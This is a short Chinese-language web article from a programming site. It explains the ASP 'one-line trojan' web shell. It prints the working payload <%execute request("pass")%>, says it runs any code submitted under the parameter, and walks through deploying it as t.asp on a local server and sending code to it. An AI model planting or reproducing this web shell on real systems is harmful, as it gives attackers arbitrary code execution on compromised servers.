您所在的位置:小祥子 » 编程 » ASP » 正文

ASP一句话木马原理介绍

时间:2015-02-05 编辑:本站 来源:本站原创

ASP一句话木马:<%execute request("pass")%>

可以认为pass是密码,以上代码的意思是执行从任何地方提交过来的代码。

一般来说通过POST提交,因为GET提交的话,URL后面的pass=xxxx(xxxx为要执行的代码),所能保存的字符长度有限。

比如说我们以上代码,保存为t.asp,放在本地可以通过http://127.0.0.1/t.asp访问,然后将以下代码保存为t.html

以下是代码
[Ctrl+A 全部选择 提示:你可先修改部分代码,再按运行]

本地直接打开t.html,输入response.Write 111,提交后是不是页面上直接就显示了111,也就意味着你本地可以让t.asp执行任意ASP代码。赶紧试试吧!

关键词:ASP 木马 一句话